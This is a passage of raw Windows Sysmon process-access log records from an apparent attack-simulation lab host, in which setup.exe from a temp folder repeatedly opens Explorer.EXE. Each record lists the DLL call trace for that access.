:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C: